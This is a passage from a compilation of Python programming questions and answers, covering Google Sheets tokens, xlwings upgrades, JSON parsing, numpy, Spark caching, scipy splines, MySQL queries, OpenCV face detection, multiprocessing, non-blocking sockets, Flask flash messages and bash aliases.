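    c = canvas.Canvas("cm_fixed.pdf", pagesize=A4)
    c.translate(2.54 * cm, 2.54 * cm)      # same physical shift as translate(inch, inch)
    text_object = c.beginText(5.0 * 2.54 * cm, 10.0 * 2.54 * cm)
    text_object.textLine("CM: text located here")
    c.drawText(text_object)
    c.save()

cm_test_fixed()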
|
Access Google spreadsheet from Google Appengine with service account : working once per hour
Question: I have implemented the Python code below, based on the documentation, in order to access a spreadsheet that is reachable through a public link. It works once every hour. If I execute it a few seconds after a success, I receive an error:
Error opening spreadsheet no element found: line 1, column 0
Assumption: The access token has an expiry of 1 hour, so App Engine would refresh the token after an hour, resetting everything.
Question: This code requests a new token for each request. So what should I do? Save the token? When I try token_to_blob in order to save the token, I get an error: Scope undefined
Thanks in advance for your help!
try :
credentials = AppAssertionCredentials(scope=('https://www.googleapis.com/auth/drive','https://spreadsheets.google.com/feeds','https://docs.google.com/feeds'))
logging.info("credentials")
http_auth = credentials.authorize(httplib2.Http())
authclient = build('oauth2','v2',http=http_auth)
auth2token = gdata.gauth.OAuth2TokenFromCredentials(credentials)
except Exception as details:
logging.error("Error Google credentials %s"%details)
return "Error"
try :
gd_client = gdata.spreadsheets.client.SpreadsheetsClient()
gd_client = auth2token.authorize(gd_client)
feed = gd_client.GetListFeed(<spreadsheetKey>,1)
except Exception as details:
logging.error("Error opening spreadsheet %s"%details)
return "Error"
Answer: I finally declared the credentials & the token as global. In this case, it was
working for several subsequent requests but after 1 hour, the token was
invalid.
I tested with the method access_token_expired but this method always returned
false.
So, I finally execute the refresh systematically and it works. Not elegant but
functional. Another option would be to store the time of next refresh and only
refresh after 1 hour.
Your comments are welcome for elegant alternatives.
I did not try gspread since the rest of the code was already functional for
gdata.spreadsheets but perhaps I should.
from oauth2client.contrib.appengine import AppAssertionCredentials
from oauth2client.client import Credentials
from oauth2client.service_account import ServiceAccountCredentials
from googleapiclient.discovery import build
import httplib2
import logging
import webapp2
import gdata.gauth
import gdata.spreadsheets.client
global credentials
global auth2token
try :
credentials = AppAssertionCredentials(scope=('https://www.googleapis.com/auth/drive','https://spreadsheets.google.com/feeds','https://docs.google.com/feeds'))
http_auth = credentials.authorize(httplib2.Http())
authclient = build('oauth2','v2',http=http_auth)
auth2token = gdata.gauth.OAuth2TokenFromCredentials(credentials)
except Exception as details:
logging.error("Error Google credentials %s"%details)
class importFromSpreadsheet(webapp2.RequestHandler):
def __importFromSpreadsheet(self,u):
try :
credentials._refresh(httplib2.Http())
except Exception as details:
logging.error("Error refreshing Google credentials %s"%details)
...
try :
gd_client = gdata.spreadsheets.client.SpreadsheetsClient()
gd_client = auth2token.authorize(gd_client)
feed = gd_client.GetListFeed(u,1)
except Exception as details:
logging.error("Error opening 1st spreadsheet %s"%details)
return "Error"
|
How to properly update xlwings
Question: After updating xlwings from `0.6` to `0.7.0`, I have the following problem.
**Although xlwings works**, when I click **Import Python UDFs**, I get an error that says:
> Run-time error '1004' Cannot run the macro...
The macro may not be available in this workbook or all macros may be disabled.
The _xlwings_ website only describes installation of the package; I could not find steps for upgrading it.
What is the proper way of upgrading _xlwings_? What should be the steps for
the upgrade?
Answer: The python package itself is updated like every other package (`pip install
--upgrade xlwings` or `conda upgrade xlwings`).
Updating the Excel add-in is explained
[here](http://docs.xlwings.org/en/stable/command_line.html#add-in-currently-
windows-only), the easiest way is to run `xlwings addin update`.
However, this expects that you have also installed the add-in previously with
`xlwings addin install`. If not, you could also update it manually by
replacing your current version (wherever that is saved) with the latest
version that is in the xlwings package (run `>>> import xlwings`, `>>>
xlwings.__path__` to see where the xlwings package has been installed).
By the way, I assume you're facing [this
issue](https://github.com/ZoomerAnalytics/xlwings/issues/331) that had been
fixed with v0.6.4
|
How to delete a specific line by line number in a file?
Question: I'm trying to write a simple Python script that always deletes line number 5 in a text file and replaces it with another string, always at line 5. I looked around but couldn't find a solution; can anyone tell me the correct way to do that?
Here is what I have so far:
#!/usr/bin/env python3
import os
import sys
import fileinput
f = open('prova.js', 'r')
filedata = f.read()
f.close()
newdata = "mynewstring"
f = open('prova.js', 'w')
f.write(newdata, 5)
f.close()
basically I need to add newdata at line 5.
Answer: Here is one simple way to remove or replace the 5th line of the file. This approach should be fine as long as the file is not too large:
fn = 'prova.js'
newdata = "mynewstring"
with open(fn, 'r') as f:
lines = f.read().split('\n')
#to delete line use "del lines[4]"
#to replace line:
lines[4] = newdata
with open(fn,'w') as f:
f.write('\n'.join(lines))
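For files too large to hold in memory, a streaming variant that writes to a temporary file and then replaces the original (a sketch, not tested against your data):
import shutil

fn = 'prova.js'
newdata = "mynewstring"
tmp = fn + '.tmp'

with open(fn, 'r') as src, open(tmp, 'w') as dst:
    for lineno, line in enumerate(src, start=1):
        dst.write(newdata + '\n' if lineno == 5 else line)   # swap out line 5 only

shutil.move(tmp, fn)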
|
Parsing Python JSON with multiple same strings with different values
Question: I am stuck on an issue where I am trying to parse for the id string in JSON
that exists more than 1 time. I am using the requests library to pull json
from an API. I am trying to retrieve all of the values of "id" but have only
been able to successfully pull the one that I define. Example json:
{
"apps": [{
"id": "app1",
"id": "app2",
"id": "new-app"
}]
}
So what I have done so far is turn the JSON response into a dictionary so that I can parse the first occurrence of "id". I have tried to create for loops, but I keep getting KeyError when trying to find the string id, or TypeError: list indices must be integers or slices, not str. The only thing that I have been able to do successfully is specify which id location to output.
(data['apps'][N]['id']) -> where N = 0, 1 or 2
This would work if there were only going to be one id string at a time, but there will always be multiple and their locations will change from time to time.
So how do I return the values of all "id" strings from this single JSON output? Full code below:
import requests
url = "http://x.x.x.x:8080/v2/apps/"
response = requests.get(url)
#Error if not 200 and exit
if response.status_code != 200:
    print("Status:", response.status_code, "Check URL. Exiting")
    exit()
#Turn response into a dict and parse for ids
data = response.json()
for n in data:
print(data['apps'][0]['id'])
OUTPUT:
app1
UPDATE: Was able to get resolution thanks to Robᵩ. Here is what I ended up
using:
def list_hook(pairs):
result = {}
for name, value in pairs:
if name == 'id':
result.setdefault(name, []).append(value)
print(value)
data = response.json(object_pairs_hook = list_hook)
Also, the API that I posted as an example is not a real API; it was just meant to be a visual representation of what I am trying to achieve. I am actually using [Mesosphere's Marathon API](https://mesosphere.github.io/marathon/docs/generated/api.html). I am trying to build a Python listener for port-mapping containers.
Answer: Your best choice is to contact the author of the API and let him know that his
data format is silly.
Your next-best choice is to modify the behavior of the JSON parser by passing in a hook function. Something like this should work:
def list_hook(pairs):
result = {}
for name, value in pairs:
if name == 'id':
result.setdefault(name, []).append(value)
else:
result[name] = value
return result
data = response.json(object_pairs_hook = list_hook)
for i in range(3):
print(i, data['apps'][0]['id'][i])
|
Using data from pythons pandas dataframes to sample from normal distributions
Question: I'm trying to sample from a normal distribution using means and standard
deviations that are stored in pandas DataFrames.
For example:
means= numpy.arange(10)
means=means.reshape(5,2)
produces:
0 1
0 0 1
1 2 3
2 4 5
3 6 7
4 8 9
and:
sts=numpy.arange(10,20)
sts=sts.reshape(5,2)
produces:
0 1
0 10 11
1 12 13
2 14 15
3 16 17
4 18 19
How would I produce another pandas dataframe with the same shape but with
values sampled from the normal distribution using the corresponding means and
standard deviations.
i.e. position `0,0` of this new dataframe would sample from a normal
distribution with `mean=0` and `standard deviation=10`, and so on.
My function so far:
def make_distributions(self):
num_data_points,num_species= self.means.shape
samples=[]
for i,j in zip(self.means,self.stds):
for k,l in zip(self.means[i],self.stds[j]):
samples.append( numpy.random.normal(k,l,self.n) )
will sample from the distributions for me but I'm having difficulty putting
the data back into the same shaped dataframe as the mean and standard
deviation dfs. Does anybody have any suggestions as to how to do this?
Thanks in advance.
Answer: You can use
[`numpy.random.normal`](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.random.normal.html)
to sample from a random normal distribution.
IIUC, then this might be easiest, taking advantage of
[`broadcasting`](http://docs.scipy.org/doc/numpy-1.10.1/user/basics.broadcasting.html):
import numpy as np
np.random.seed(1) # only for demonstration
np.random.normal(means,sts)
array([[ 16.24345364, -5.72932055],
[ -4.33806103, -10.94859209],
[ 16.11570681, -29.52308045],
[ 33.91698823, -5.94051732],
[ 13.74270373, 4.26196287]])
Check that it works:
np.random.seed(1)
print np.random.normal(0,10)
print np.random.normal(1,11)
16.2434536366
-5.72932055015
If you need a pandas DataFrame:
import pandas as pd
pd.DataFrame(np.random.normal(means,sts))
|
Does Spark discard ephemeral rdds immediately?
Question: Several sources describe RDDs as _ephemeral_ by default (e.g., [this s/o
answer](http://stackoverflow.com/a/25627654/5108214)) -- meaning that they do
not stay in memory unless we call cache() or persist() on them.
So let's say our program involves an ephemeral (not explicitly cached by the
user) RDD that is used in a few operations that cause the RDD to materialize.
My question is: does Spark _discard_ the materialized ephemeral RDD
_immediately_ -- or is it possible that the RDD stays in memory for other
operations, even if we never asked for it to be cached?
Also, if an ephemeral RDD stays in memory, is it always only because some LRU
policy has not yet kicked it out -- or can it also be because of scheduling
optimizations?
I've tried to figure that out with code like that below -- run with Jupyter
notebook with python 3.5 and spark 1.6.0, on a 4-core machine -- but I would
appreciate an answer by someone who knows for sure.
import pyspark
sc = pyspark.SparkContext()
N = 1000000 # size of dataset
THRESHOLD = 100 # some constant
def f():
""" do not chache """
rdd = sc.parallelize(range(N))
for i in range(10):
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
def g():
""" cache """
rdd = sc.parallelize(range(N)).cache()
for i in range(10):
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
For the two functions above, f() does not ask the RDD to persist, but g() does, at the beginning. When I time the two functions, f() and g(), I get very comparable performance, as if the cache() call made no difference. (In fact, the one that uses caching is slower.)
%%timeit
f()
> 1 loops, best of 3: 2.19 s per loop
%%timeit
g()
> 1 loops, best of 3: 2.7 s per loop
Actually, even modifying f() to call unpersist() on the RDD does not change
things.
def ff():
""" modified f() with explicit call to unpersist() """
rdd = sc.parallelize(range(N))
for i in range(10):
rdd.unpersist()
print(rdd.filter(lambda x: x > i * THRESHOLD).count())
%%timeit
ff()
> 1 loops, best of 3: 2.25 s per loop
The documentation for unpersist() states that it "mark[s] the RDD as non-
persistent, and remove[s] all blocks for it from memory and disk." Is this
really so, though - or does Spark ignore the call to unpersist when it knows
it's going to use the RDD down the road?
Answer: There is simply no value in caching here. Creating `RDD` from a `range` is
extremely cheap (every partition needs only two integers to get going) and
action you apply cannot really benefit from caching. `persist` is applied on
the Java object not a Python one, and your code doesn't perform any work
between RDD creation and the first transformation.
Even if you ignore all of that this is a very simple task with tiny data.
Total cost is most likely driven by scheduling and communication than anything
else.
If you want to see caching in action consider following example:
from pyspark import SparkContext
import time
def f(x):
time.sleep(1)
return x
sc = SparkContext("local[5]")
rdd = sc.parallelize(range(50), 5).map(f)
rdd.cache()
%time rdd.count() # First run, no data cached ~10 s
## CPU times: user 16 ms, sys: 4 ms, total: 20 ms
## Wall time: 11.4 s
## 50
%time rdd.count() # Second time, task results fetched from cache
## CPU times: user 12 ms, sys: 0 ns, total: 12 ms
## Wall time: 114 ms
## 50
rdd.unpersist() # Data unpersisted
%time rdd.count() # Results recomputed ~10s
## CPU times: user 16 ms, sys: 0 ns, total: 16 ms
## Wall time: 10.1 s
## 50
While in simple cases like this one persisting behavior is predictable in
general caching should be considered a hint not a contract. Task output may be
persisted or not depending on available resources and can be evicted from
cache without any user intervention.
|
What algorithm is used in the interp1d function in scipy.interpolate?
Question: I was writing a Python program for my numerical methods course, and I had to code a cubic spline routine. I implemented the cubic spline formula given in books like [Numerical Methods by Chapra and Canale](http://rads.stackoverflow.com/amzn/click/0073401064) and [Numerical Mathematics by Cheney and Kincaid](http://rads.stackoverflow.com/amzn/click/1133103715).
so my data is
x=[1.0,3.0,4.0,7.0]
y=[1.5,4.5,9.0,25.5]
Using this data and applying my cubic spline, for `x=1.5` I get `y=1.79122340426`.
While using this same data but using the scipy function gives:
>>> scipy.interpolate.interp1d(x, y, kind='cubic')(1.5)
array(1.265624999999932)
So why is there a difference in the results? It is obvious that they are not using the same formula. What cubic spline formula is used in that scipy function? Is it a natural cubic spline or something improved? Note: the value 1.2656 is more accurate.
Answer: EDIT: @ev-br in the comments for this answer provided an important correction
to my answer. In fact the interp1d spline is not FITPACK-based. Check the comments
for the link provided by @ev-br.
The Scipy functions for curve fitting are based on FITPACK. Try seeing the
documentation on the functions you are using and you'll be able to see a
"References" chapter where something like this will appear:
Notes
-----
See splev for evaluation of the spline and its derivatives. Uses the
FORTRAN routine curfit from FITPACK.
If provided, knots `t` must satisfy the Schoenberg-Whitney conditions,
i.e., there must be a subset of data points ``x[j]`` such that
``t[j] < x[j] < t[j+k+1]``, for ``j=0, 1,...,n-k-2``.
References
----------
Based on algorithms described in [1]_, [2]_, [3]_, and [4]_:
.. [1] P. Dierckx, "An algorithm for smoothing, differentiation and
integration of experimental data using spline functions",
J.Comp.Appl.Maths 1 (1975) 165-184.
.. [2] P. Dierckx, "A fast algorithm for smoothing data on a rectangular
grid while using spline functions", SIAM J.Numer.Anal. 19 (1982)
1286-1304.
.. [3] P. Dierckx, "An improved algorithm for curve fitting with spline
functions", report tw54, Dept. Computer Science,K.U. Leuven, 1981.
.. [4] P. Dierckx, "Curve and surface fitting with splines", Monographs on
Numerical Analysis, Oxford University Press, 1993.
These references in particular where taken from the source of
[fitpack.py](https://github.com/scipy/scipy/blob/master/scipy/interpolate/fitpack.py)
on the function "splrep". If you need to do a very thorough comparison between
your algorithm and the spline from interp1D just go to the docs:
[scipy.interpolate.interp1d](http://docs.scipy.org/doc/scipy-0.16.0/reference/generated/scipy.interpolate.interp1d.html#scipy-
interpolate-interp1d)
And you'll see a link called
[[source]](https://github.com/scipy/scipy/blob/v0.16.1/scipy/interpolate/interpolate.py#L306)
right after the definition of the name of the function (so:
scipy.interpolate.interp1D [source]). Remember that there's a lot of routine
handlers on these functions so be patient while navigating the source.
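If you want to check the boundary-condition difference yourself, newer SciPy (0.18+, so an assumption relative to the versions discussed above) exposes `CubicSpline`, which lets you request a natural spline explicitly and compare it with `interp1d` on the same data:
import numpy as np
from scipy.interpolate import interp1d, CubicSpline

x = np.array([1.0, 3.0, 4.0, 7.0])
y = np.array([1.5, 4.5, 9.0, 25.5])

print(interp1d(x, y, kind='cubic')(1.5))           # interp1d's cubic interpolant
print(CubicSpline(x, y, bc_type='natural')(1.5))   # natural cubic spline for comparison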
|
Having issues with using mysql SELECT in a function
Question: I started learning MySQL and got stuck on why this command is not working. I had success with UPDATE commands and SELECT * outside the function, so I guess I am making a mistake in calling the function, or perhaps the %s needs to be different... My Google-fu did not find anything, so I hope you all can help me!
Thank you so much for looking!
CODE:
def CheckBalance(UserName, BetAmount): #checks to make sure they can afford the bet. Returns 0 for no 1 for yes
import mysql.connector
cnx = mysql.connector.connect(user='root', password='Password',
host='127.0.0.1',
database='crapsdatabase')
c = cnx.cursor()
BankRoll = c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", UserName)
if(BankRoll < BetAmount) or (BetAmount < 0):
c.close()
return 0
if(BankRoll >= BetAmount):
c.close()
return 1
From our main program I import the UpdateDatabase and call it
from plugins.database.UpdateDatabase import UpdateBets
a = UpdateBets.CheckBalance("bob", 100)
print(a)
This gives the following error:
C:\python\python.exe C:/Users/Ray/Desktop/bot/plugins/CRAPS/CrapsUpdated.py
Traceback (most recent call last):
File "C:/Users/Ray/Desktop/bot/plugins/CRAPS/CrapsUpdated.py", line 3, in <module>
a = UpdateBets.CheckBalance("bob", 100)
File "C:\Users\Ray\Desktop\bot\plugins\database\UpdateDatabase.py", line 16, in CheckBalance
BankRoll = c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", UserName)
File "C:\python\lib\site-packages\mysql\connector\cursor.py", line 515, in execute
self._handle_result(self._connection.cmd_query(stmt))
File "C:\python\lib\site-packages\mysql\connector\connection.py", line 488, in cmd_query
result = self._handle_result(self._send_cmd(ServerCmd.QUERY, query))
File "C:\python\lib\site-packages\mysql\connector\connection.py", line 395, in _handle_result raise errors.get_exception(packet)
mysql.connector.errors.ProgrammingError: 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%s' at line 1
Answer: You should pass the query parameters as a sequence (a tuple or list), so it should be like this:
c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", (UserName,))
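A fuller sketch of the balance check: besides passing the parameters as a tuple, note that `execute()` does not return the selected value itself, so you need `fetchone()` (connection details copied from the question):
import mysql.connector

def CheckBalance(UserName, BetAmount):
    cnx = mysql.connector.connect(user='root', password='Password',
                                  host='127.0.0.1', database='crapsdatabase')
    c = cnx.cursor()
    c.execute("SELECT PlayerBank FROM player WHERE PlayerName = %s", (UserName,))
    row = c.fetchone()                 # execute() returns None; fetch the row explicitly
    c.close()
    cnx.close()
    if row is None:                    # unknown player
        return 0
    BankRoll = row[0]
    if BetAmount < 0 or BankRoll < BetAmount:
        return 0
    return 1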
|
Detecting faces from camera using Opencv Python
Question: I am currently trying to detect faces from my laptop camera, but for some reason the code I found is not giving a result. The code starts the webcam and gives no errors, but no rectangles are drawn for the faces. No faces are being detected, hence the for loop never runs; I tried changing the scale factor but that did not help. Both XML files are in the same folder as the code. The code is as follows:
import numpy as np
import cv2
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
img = cv2.VideoCapture(0)
while(1):
_,f=img.read()
gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = f[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
cv2.imshow('img',f)
if cv2.waitKey(25) == 27:
break
cv2.destroyAllWindows()
img.release()
Answer: Hello, your program works fine. You have 2 small problems. First, you need to indent this code so that it sits inside the while loop:
    cv2.imshow('img',f)
    if cv2.waitKey(25) == 27:
        break
Second, make sure your XML files are found. This is my code:
import numpy as np
import cv2
face_cascade = cv2.CascadeClassifier('/usr/local/Cellar/opencv3/3.0.0/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('/usr/local/Cellar/opencv3/3.0.0/share/OpenCV/haarcascades/haarcascade_eye.xml')
img = cv2.VideoCapture(0)
while(1):
_,f=img.read()
gray = cv2.cvtColor(f, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
for (x,y,w,h) in faces:
cv2.rectangle(f,(x,y),(x+w,y+h),(255,0,0),2)
roi_gray = gray[y:y+h, x:x+w]
roi_color = f[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for (ex,ey,ew,eh) in eyes:
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)
cv2.imshow('Test',f)
if cv2.waitKey(25) == 27:
break
cv2.destroyAllWindows()
img.release()
|
Running a function in each iteration of a loop as a new process in python
Question: I have this:
from multiprocessing import Pool
pool = Pool(processes=4)
def createResults(uniqPath):
*(there is some code here that populates a list - among other things)*
for uniqPath in uniqPaths:
pool.map(createResults, uniqPath)
pool.close()
pool.join()
I don't know if it's possible, but can I run the createResults function that
gets called in that loop as a new process for each iteration?
I'm populating a list using a 4 million line file and it's taking 24+ hours to
run. (Obviously the code above does not work)
Thanks!
Answer: Instead of:
for uniqPath in uniqPaths:
pool.map(createResults, uniqPath)
Do this:
pool.map(createResults, uniqPaths)
You must use map on the iterable itself in order to run in a concurrent
fashion.
Keep in mind, though: populating a list inside the workers means the list won't be shared between the processes. If you need shared state, use something like
[`Array()`](https://docs.python.org/3.5/library/multiprocessing.html#multiprocessing.Array),
and make sure access to it is process-safe.
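If the goal is just to build one big list, the simplest pattern is usually to have the worker return its partial results and let `pool.map` collect them; a sketch with placeholder inputs:
from multiprocessing import Pool

def createResults(uniqPath):
    # build and return the results for this path (placeholder body)
    return [uniqPath]

if __name__ == '__main__':
    uniqPaths = ["path-a", "path-b", "path-c"]              # stands in for the real inputs
    pool = Pool(processes=4)
    partial_results = pool.map(createResults, uniqPaths)    # one result list per path
    all_results = [item for sub in partial_results for item in sub]
    pool.close()
    pool.join()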
|
How to connect() with a non-blocking socket?
Question: In Python, I would like to use `socket.connect()` on a socket that I have set
to non-blocking. When I try to do this, the method always throws a
`BlockingIOError`. When I ignore the error (as below) the program executes as
expected. When I set the socket to non-blocking after it is connected, there
are no errors. When I use select.select() to ensure the socket is readable or
writable, I still get the error.
**testserver.py**
import socket
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
host = socket.gethostname()
port = 1234
sock.bind((host, port))
sock.listen(5)
while True:
select.select([sock], [], [])
con, addr = sock.accept()
message = con.recv(1024).decode('UTF-8')
print(message)
**testclient.py**
import socket
import select
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
host = socket.gethostname()
port = 1234
try:
sock.connect((host, port))
except BlockingIOError as e:
print("BlockingIOError")
msg = "--> From the client\n"
select.select([], [sock], [])
if sock.send(bytes(msg, 'UTF-8')) == len(msg):
print("sent ", repr(msg), " successfully.")
sock.close()
**terminal 1**
$ python testserver.py
--> From the client
**terminal 2**
$ python testclient.py
BlockingIOError
sent '--> From the client\n' successfully.
This code works correctly except for the BlockingIOError on the first
connect(). The documentation for the error reads like this: `Raised when an
operation would block on an object (e.g. socket) set for non-blocking
operation.`
**How do I properly connect() with a socket set to non-blocking? Can I make
connect() non-blocking? Or is it appropriate to just ignore the error?**
Answer: The trick here is that when the select completes the first time, _then_ you
need to call `sock.connect` again. ~~The socket is not connected until you
have received a successful return status from `connect`.~~
Just add these two lines _after_ the first call to `select` completes:
print("first select completed")
sock.connect((host, port))
EDIT:
Followup. I was wrong to have stated that an additional call to `sock.connect`
is required. It is however a good way to discover whether the original non-
blocking call to `connect` succeeded if you wish to handle the connection
failure in its own code path.
The traditional way of achieving this in C code is explained here: [Async
connect and disconnect with epoll
(Linux)](http://stackoverflow.com/questions/10187347/async-connect-and-
disconnect-with-epoll-linux/10194883#10194883)
This involves calling `getsockopt`. You can do this in python too but the
result you get back from `sock.getsockopt` is a `bytes` object. And if it
represents a failure, you then need to convert it into an integer `errno`
value and map that to a string (or exception or whatever you require to
communicate the issue to the outside world). Calling `sock.connect` again maps
the `errno` value to an appropriate exception already.
Solution 2: You can also simply defer calling `sock.setblocking(0)` until
_after_ the connect has completed.
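For completeness, a small sketch of the `getsockopt` approach in Python; calling it without a buffer-size argument returns the error code as an integer directly, which avoids the bytes-decoding step (this assumes `sock` is the non-blocking client socket from the question):
import os
import select
import socket

select.select([], [sock], [])    # wait until the socket is writable
err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
    # the non-blocking connect failed; raise a matching exception
    raise OSError(err, os.strerror(err))
# err == 0: the connection is established and sock.send() can be used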
|
Python - flask - understanding behaviour of routing / flash()
Question: I'm new to this. I can't understand why the app doesn't seem to be able to
keep hold of data that was randomly generated. get_question() returns a dict
with 2 key:value pairs. The question/answer are randomly generated from this
function. Every time flash() is called does it rerun all of the code inside
index()? When the flashed messages appear, the user's answer correlates to
what was typed in, but the question and correct answer seem to appear at random, suggesting that the whole of index() is called again every time submit is clicked. How do I prevent that from happening? Should I be using 'session'?
UPDATE: To be more specific - I can't understand why the flashed messages are
completely unrelated to what is rendered in the browser. It seems as though
flash() is running its own call to my get_question() function and as a result
is getting different questions/answers to the ones shown?
[Here are some images that show the
problem](http://i.stack.imgur.com/fe2yT.png)
@app.route('/', methods=['GET', 'POST'])
@app.route('/index', methods=['GET', 'POST'])
def index():
user = {'nickname': 'test'} # fake user
question = question_gen.get_question()
answer = AnswerQuestionForm()
q = question['question']
correct = question['answer']
response = ""
if answer.validate_on_submit():
you_said = request.form['answer']
print("You said {}, to the question {}. correct was {}".format(you_said, q, correct))
flash("The question was: %s" % q)
flash("The correct answer was: %s" % correct)
flash("You said: %s" % you_said)
return redirect(url_for('index'))
return render_template('index.html',
title='Home',
user=user,
question=question,
answer=answer,
response=response)
Answer: Think of `flash` like a filing cabinet. When you run the `flash('message')`
command all it does it store that message in the cabinet. If your templates
aren't actively looking in the cabinet for messages and taking them out,
they'll just keep building up. Sometimes that is confusing if you're not
immediately grabbing them on the next page, because when you do finally check
for them, the feedback that was generated at that point is now shown when it's
not longer useful (and likely is now confusing).
So if we assume a simple app like:
from flask import Flask, flash, render_template
from datetime import datetime
app = Flask(__name__)
app.secret_key = 'SO'
@app.route('/')
def store():
flash('Stored at {}'.format(datetime.now()))
return 'Reload to store another message!'
@app.route('/contents/')
def contents():
return render_template('contents.html')
if __name__ == '__main__':
app.run(debug=True)
With the contents of `contents.html` being:
<!doctype html>
<title>Messages</title>
{% with messages = get_flashed_messages() %}
{% if messages %}
<ul class=flashes>
{% for message in messages %}
<li>{{ message }}</li>
{% endfor %}
</ul>
{% endif %}
{% endwith %}
If I go to `/` ten times and then load up `/contents/`, it'll render my `contents.html` template and display any waiting messages. Essentially the template code is saying "open the filing cabinet, pull out and display each stored message, then throw it away". Generally the template code above is included in **every** page template, so the flashed feedback is immediate and doesn't build up.
**Update**
If you look at your program flow, the first time a user accesses the page
without a form submission, the following happens:
1. Get random question
2. Render the `index.html` template using the random question
When a user fills in the answer and submits the form, the following happens:
1. Get a new random question
2. Pull the `answer` field from the form
3. Print the `answer` field from the form, the new randomly generated `question` and the new randomly generated `answer`.
4. Flash the same information
5. Redirect the user to the `index` view
At this point, nothing's been shown to the user, the (incorrect) flashed
messages are already in the cabinet, but we're not finished because of the
redirect:
6. Get another random question
7. Render the `index` template using the random question
What you're missing is the ability to look up an existing question: when the form is submitted, you need some logic that says "get me the question that matches this submitted form entry so I can check the answer is correct".
Usually that's done with an `id` key, e.g. `question = {id: 1, question: "1+1", answer: "2"}`. Then you could store that `id` as a hidden field in your form and adjust your `get_question` to optionally take an `id` argument so it can look through your list of questions to find the correct one, as sketched below.
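A rough sketch of that idea; `question_id` as a `HiddenField` on `AnswerQuestionForm`, an `id` key in the question dict, and a `qid` parameter on `get_question` are all assumptions about code not shown here:
# imports, app, question_gen and the form class as in the question above
@app.route('/', methods=['GET', 'POST'])
@app.route('/index', methods=['GET', 'POST'])
def index():
    answer = AnswerQuestionForm()
    if answer.validate_on_submit():
        # look the original question back up instead of generating a new one
        question = question_gen.get_question(qid=answer.question_id.data)
        flash("The question was: %s" % question['question'])
        flash("The correct answer was: %s" % question['answer'])
        flash("You said: %s" % answer.answer.data)
        return redirect(url_for('index'))
    question = question_gen.get_question()          # fresh random question on GET
    answer.question_id.data = question['id']        # remember which one we asked
    return render_template('index.html', title='Home', question=question, answer=answer)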
|
Alias to Launch Python .py Script
Question: I am trying to create aliases to launch mystepper6.py and moveit.py and sudo ps ax by placing the following aliases in sudo nano ~/.bashrc. (Note: I am using Python 2 for this script.)
reboot='sudo reboot'
ax='sudo ps ax'
runstepper='python home/pi/mystepper6.py'
moveit='sudo python home/pi/moveit.py'
The alias reboot works fine but none of the others work at all. All I get is
"bash: runstepper: command not found".
I am doing this because I am trying to control my webcam on my Raspberry Pi 2
using my iPhone with the iFreeRDP app. I use remote desktop connection from my
Windows 10 laptop. The problem with this app and some other similar apps is that the period and space keys do not function (it is a known, reported issue).
This makes typing full commands impossible.
Incidentally, I tried to use the VNC Viewer iPhone app and got my Raspberry Pi 2 hijacked when I loaded the required software onto the RPi2, requiring me to get a new SD card. Fortunately, I had just cloned my SD card a few hours prior. Long story, but I am very wary of using VNC Viewer now.
Please help me with my aliases so I can either type one word with no spaces or periods, or create a desktop shortcut that I can double-click, as a workaround for the deficiencies of these otherwise good apps. I am not sure Ctrl + C works on the app keyboards either, so a shortcut for that would be good as well.
Answer: To create aliases in your shell, you should use the
[`alias`](http://ss64.com/bash/alias.html) shell directive:
alias ax='sudo ps ax'
To run `ps ax` you do not need to `sudo` first. If you're running a standard
kernel, any user can see the list of all processes without special privileges.
For the two python aliases:
alias runstepper='python home/pi/mystepper6.py'
alias moveit='sudo python home/pi/moveit.py'
^-- missing / here
Do not forget the leading `/` in the path; otherwise, whenever you launch the aliased command, Python will look up the script relative to the current directory. I.e., if you're in `/home/pi`, it will look for `/home/pi/home/pi/mystepper6.py` and tell you the script does not exist. So the proper commands should be:
alias runstepper='python /home/pi/mystepper6.py'
alias moveit='sudo python /home/pi/moveit.py'
* * *
Though as a suggestion: instead of making aliases to run Python scripts, I'd make them into a proper Python package. This assumes that in both scripts the entry point is a function called `main()`, i.e., both scripts end with:
if __name__ == "__main__":
main()
you should create a directory for your project:
cd /home/pi
# create a directory for your python project:
mkdir motion_control
# create a directory to place your scripts within:
mkdir motion_control/motion_control
# adding an empty __init__.py file makes that directory a python package
touch motion_control/motion_control/__init__.py
nano motion_control/setup.py
and now you just have to add this within the setup.py file:
from setuptools import setup
setup(name='motion_control',
version='0.1',
description="Python library to operate stuff that move on my rasppi",
long_description='explain how to use the tools installed by this package',
classifiers=[],
keywords='raspberrypi motion control',
author='YOU',
author_email='YOUR@EMAIL',
url='ANY URL YOU THINK IS RELEVANT',
license='MIT', # or any license you think is relevant
packages=['motion_control'],
zip_safe=False,
install_requires=[
# add here any tool that you need to install via pip
# to have this package working
'setuptools',
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
runstepper = motion_control.mystepper6:main
moveit = motion_control.moveit:main
""",
)
the `entry_points` part is very important, as it's telling python where to
look for the first function to execute to have the script run. For example:
moveit = motion_control.moveit:main
means "look for the main() function within the moveit module in the
motion_control package". So adapt accordingly! As a note: don't make that
